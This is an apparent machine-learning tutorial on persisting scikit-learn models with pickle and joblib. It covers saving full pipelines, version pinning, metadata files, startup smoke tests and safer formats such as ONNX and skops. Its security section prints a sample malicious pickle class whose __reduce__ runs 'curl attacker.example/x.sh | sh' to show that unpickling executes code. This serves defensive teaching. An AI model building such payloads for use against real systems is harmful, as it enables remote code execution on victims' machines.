Machine Learning Essentials

Saving & Loading Models (joblib, pickle)


A model reaches 91% accuracy after forty minutes of training. It gets saved, wrapped in a small web service, and deployed. The service starts cleanly, returns predictions for every request, and logs no errors at all.

Three weeks later someone notices the predictions are barely better than guessing.

The cause takes an afternoon to find. During training, the features were standardised — income divided by a standard deviation of about 24,000, giving values between −2 and 3. The saved file contained the classifier. It did not contain the scaler. In production, raw income values of 52,000 are being fed to a model whose coefficients were fitted on numbers near zero.

Nothing crashed. The array had the right shape and the right dtype, so the model multiplied the numbers by its coefficients and returned a confident probability. It was simply wrong every time.

This is the defining hazard of model persistence: the failures are silent. A web server that cannot find a file throws an error. A model given wrongly scaled inputs returns a plausible number.

What must go in the file, bottom to topRaw request fieldsImputerfitted on trainScaler withtrain meansOne-hotencoder categoriesThe trainedestimatortopbottomPickle the pipeline and every layer travels with it; pickle the estimator alone and the rest is gone.
The service returned predictions and logged no errors because unscaled inputs are still valid numbers.

What you are actually saving

Before training, a scikit-learn estimator holds only the settings you passed in. After fit(), it holds the learned parameters — by convention, attributes ending in an underscore.

Python
from sklearn.linear_model import LogisticRegressionclf = LogisticRegression()clf.fit(X_train, y_train)print(clf.coef_)          # learned weights, one per featureprint(clf.intercept_)     # learned biasprint(clf.classes_)       # class labels, in the order predict_proba usesprint(clf.n_features_in_) # how many columns it expects

Those arrays are the entire result of training. Everything else — the class definition, the prediction arithmetic — lives in the installed library.

Which is why a preprocessing object is just as much a trained model as the classifier is:

Python
from sklearn.preprocessing import StandardScalerscaler = StandardScaler().fit(X_train)print(scaler.mean_)    # e.g. [41207.3, 38.4, 2.1]print(scaler.scale_)   # e.g. [23984.1, 12.7, 1.4]

Those two arrays were computed from your training data and cannot be recovered from anywhere else. Lose them and the classifier is meaningless, because it was fitted on a transformed space you can no longer reproduce.

Every object that learned something from the training data is part of the model. Scalers, encoders, imputers, and feature selectors all qualify. Saving only the estimator saves a fraction of what you trained.

Pickle: Python's general-purpose serialiser

Python
import picklewith open("model.pkl", "wb") as f:      # 'wb' = write binary    pickle.dump(clf, f)with open("model.pkl", "rb") as f:    loaded = pickle.load(f)

Pickle walks the object graph and writes a byte stream that reconstructs it. The crucial detail is what it does not write: it stores a reference to the class (sklearn.linear_model.LogisticRegression) rather than the class's code. On load, it imports that class from whatever is installed and repopulates its attributes.

Three consequences follow directly, and all three cause production incidents:

  • The library must be installed to load the file.
  • A different library version may have a different internal structure, so loading may fail or — worse — succeed with subtly altered behaviour.
  • A custom class must be importable from the same module path it had when saved. Move MyTransformer from utils.py to features.py and every existing pickle breaks.

joblib: the same idea, tuned for arrays

Python
import joblibjoblib.dump(clf, "model.joblib")loaded = joblib.load("model.joblib")joblib.dump(clf, "model.joblib.gz", compress=3)   # 0–9; 3 is a good default

Joblib uses pickle underneath and adds two things that matter for models: built-in compression, and the option to memory-map large NumPy arrays when loading (joblib.load(path, mmap_mode="r")), so several processes on one machine can share a single copy. It is not meaningfully faster than plain pickle on a current Python — both write NumPy arrays as raw blocks of bytes. Measured for a 500-tree random forest on one laptop (Python 3.12, scikit-learn 1.9):

picklejoblibjoblib, compress=3
Save time0.14 s0.13 s1.6 s
Load time0.10 s0.14 s0.3 s
File size209 MB209 MB45 MB

Compression trades CPU for disk. It is worth it when the file crosses a network on every container start and not worth it when a service reloads the model frequently from local disk.

Use joblib for scikit-learn objects. The API is nearly identical, compression and memory-mapping come built in, and it is the convention in scikit-learn's own documentation.

The forgotten-preprocessing bug, with numbers

Here is the opening failure made explicit. Training data has mean income 41,207 and standard deviation 23,984.

Python
# --- training ---scaler = StandardScaler().fit(X_train)X_scaled = scaler.transform(X_train)clf = LogisticRegression().fit(X_scaled, y_train)joblib.dump(clf, "model.joblib")     # the bug: scaler not saved# --- serving ---clf = joblib.load("model.joblib")clf.predict_proba([[52000, 34, 3]])  # raw values, never scaled

What the model expected for a customer earning £52,000:

52000−4120723984=0.45\frac{52000 - 41207}{23984} = 0.45

What it received: 52,000. If the coefficient on that feature is 0.8, the contribution to the log-odds should be 0.36. Instead it is 41,600. The sigmoid of any such number is 1.0 to more decimal places than float64 can express.

So the service returns a probability of 1.0 for essentially every customer, because every real income is a large positive number. No exception, no warning, no failed health check — just a model that has degenerated into a constant.

Pipelines make the bug impossible

The fix is not vigilance. It is arranging things so there is nothing to forget.

Python
from sklearn.pipeline import Pipelinefrom sklearn.compose import ColumnTransformerfrom sklearn.impute import SimpleImputerfrom sklearn.preprocessing import StandardScaler, OneHotEncoderfrom sklearn.ensemble import RandomForestClassifiernumeric = ["income", "age", "num_products"]categorical = ["region", "channel"]pipe = Pipeline([    ("pre", ColumnTransformer([        ("num", Pipeline([("impute", SimpleImputer(strategy="median")),                          ("scale", StandardScaler())]), numeric),        ("cat", Pipeline([("impute", SimpleImputer(strategy="most_frequent")),                          ("encode", OneHotEncoder(handle_unknown="ignore"))]),         categorical),    ])),    ("clf", RandomForestClassifier(n_estimators=300, random_state=42)),])pipe.fit(X_train, y_train)joblib.dump(pipe, "pipeline.joblib")     # one file, everything inside

Now serving takes raw input in exactly the form the training data had:

Python
import pandas as pdpipe = joblib.load("pipeline.joblib")row = pd.DataFrame([{"income": 52000, "age": 34, "num_products": 3,                     "region": "north", "channel": "web"}])print(pipe.predict_proba(row)[0, 1])

The imputation, the scaling, and the encoding all happen inside, using the exact statistics learned at training time. There is no second implementation to drift out of sync, and a missing preprocessing step is now a structural impossibility rather than a discipline problem.

handle_unknown="ignore" earns its place here too. A region that never appeared in training would otherwise raise an exception on the first request that contains it, which in a live service means a 500 at an unpredictable moment.

Version brittleness, the quiet production killer

Pickle files record class references, not code. Load a model saved under scikit-learn 1.2 into an environment running 1.5 and one of three things happens:

OutcomeHow it appearsSeverity
Works fineNothingThe common case
Raises on loadAttributeError, ModuleNotFoundErrorAnnoying but loud — you find out immediately
Loads with changed behaviourInconsistentVersionWarning, or nothingDangerous — silently different predictions

Three defences, all cheap.

Pin exact versions. Not scikit-learn>=1.2 but scikit-learn==1.9.1, in the same repository as the training code.

Record the environment beside the model.

Python
import json, sys, sklearn, numpy, joblibfrom datetime import datetime, timezonemetadata = {    "model_name": "churn_classifier",    "version": "2.3.0",    "trained_at": datetime.now(timezone.utc).isoformat(),    "python": sys.version.split()[0],    "sklearn": sklearn.__version__,    "numpy": numpy.__version__,    "feature_names": list(X_train.columns),    "n_training_rows": int(len(X_train)),    "target_positive_rate": float(y_train.mean()),    "metrics": {"roc_auc": 0.887, "recall_at_threshold": 0.71},    "decision_threshold": 0.34,    "training_data_snapshot": "s3://data/churn/2026-03-01.parquet",}joblib.dump(pipe, "churn_v2.3.0.joblib")with open("churn_v2.3.0.meta.json", "w") as f:    json.dump(metadata, f, indent=2)

The decision_threshold field matters more than it looks. If you tuned a cutoff of 0.34 against real costs, that number is part of the model. Store it with the file or someone will deploy the pipeline behind a hard-coded 0.5 and quietly undo your work.

Run a smoke test on load. Keep a handful of rows with known-correct outputs and verify them at startup.

Python
import numpy as npdef load_and_verify(model_path, fixture_path):    model = joblib.load(model_path)    fixture = pd.read_json(fixture_path)          # inputs + expected outputs    got = model.predict_proba(fixture[FEATURES])[:, 1]    if not np.allclose(got, fixture["expected"].values, atol=1e-6):        raise RuntimeError(            f"model output changed: expected {fixture['expected'].tolist()}, "            f"got {got.tolist()}"        )    return model

This turns the dangerous third row of that table into the merely annoying second row. A twenty-line check at startup converts silent corruption into a loud failure, which is the single highest-value habit in this entire topic.

Security: loading a pickle runs code

This is not a theoretical concern and it is not a bug in pickle — it is how pickle works. The format includes an instruction that calls a function during reconstruction.

Python
import pickle, osclass Exploit:    def __reduce__(self):        return (os.system, ("curl attacker.example/x.sh | sh",))payload = pickle.dumps(Exploit())# pickle.loads(payload) would execute that shell command

No exotic technique is involved. Any object may define __reduce__, and unpickling calls it.

The rule follows directly: never load a pickle or joblib file from a source you do not control. That includes model files downloaded from public hubs, uploaded by users, or pulled from a bucket that anyone can write to. Treat loading one as equivalent to running a script that arrived in the same way.

Where you must accept models from outside your trust boundary, use a format that cannot execute code:

FormatExecutes code on load?Cross-language?Good for
pickle / joblibYesNoYour own models, in your own infrastructure
ONNXNoYesServing from C++, Java, or the browser; long-term stability
PMMLNoYesEnterprise settings with existing PMML tooling
JSON of raw parametersNoYesSimple linear models you reimplement deliberately
skops (.skops)No — refuses any type not on its trusted listNoscikit-learn models from outside your team
safetensorsNoYesNeural network weights (tensors only, no Python objects)

ONNX also solves the version problem, because it stores the computation graph rather than references to library classes. The cost is conversion effort and incomplete coverage of scikit-learn transformers, which is why most teams stay on joblib internally and reach for ONNX only when crossing a language or trust boundary. An all-numeric pipeline converts in one call:

Python
from skl2onnx import to_onnximport numpy as npnum_pipe = Pipeline([("scale", StandardScaler()),                     ("clf", RandomForestClassifier(n_estimators=300, random_state=42))])num_pipe.fit(X_train[numeric], y_train)onx = to_onnx(num_pipe, X_train[numeric][:1].to_numpy(dtype=np.float32))with open("model.onnx", "wb") as f:    f.write(onx.SerializeToString())

The mixed-type pipeline from earlier does not convert as it stands: text columns need their own declared input types, and the converter for SimpleImputer does not handle missing values in text columns. Expect to adjust a pipeline before it will export.

Loading in a running service

One mistake dominates: loading the model inside the request handler.

Python
# wrong - deserialises 200 MB on every request@app.post("/predict")def predict(payload: dict):    model = joblib.load("pipeline.joblib")    return {"p": float(model.predict_proba(to_frame(payload))[0, 1])}# right - load once at startup, reuse for every requestMODEL = load_and_verify("pipeline.joblib", "fixtures.json")@app.post("/predict")def predict(payload: dict):    return {"p": float(MODEL.predict_proba(to_frame(payload))[0, 1])}

The first version adds a tenth of a second or more, plus considerable memory churn, to every call. The second loads once, fails loudly at startup if anything is wrong, and serves from memory.

Two related practices worth adopting. Version the filename (churn_v2.3.0.joblib) rather than overwriting model.joblib, so rolling back is a configuration change rather than a retraining job. And return the model version in the response body, so that a prediction logged in a database can later be traced to the exact artefact that produced it.

What this means when you build something

Save the pipeline, never the estimator. If your saved file does not contain the scaler, the encoder, and the imputer, you have not saved a model — you have saved half of one, and the half you kept will not complain about the half you lost.

Write a metadata file next to it with library versions, feature names in order, the decision threshold, and the metrics you measured. It costs ten lines and it is what you will read in nine months when someone asks why the numbers moved.

Keep five example rows with their expected outputs, and check them every time the model loads. That single test catches version drift, wrong-file deployments, and feature-order mistakes — the three failures that otherwise show up weeks later as a quiet decline nobody can explain.

And treat every model file as executable code, because that is exactly what it is. Load your own artefacts from storage you control, and never joblib.load something a user uploaded.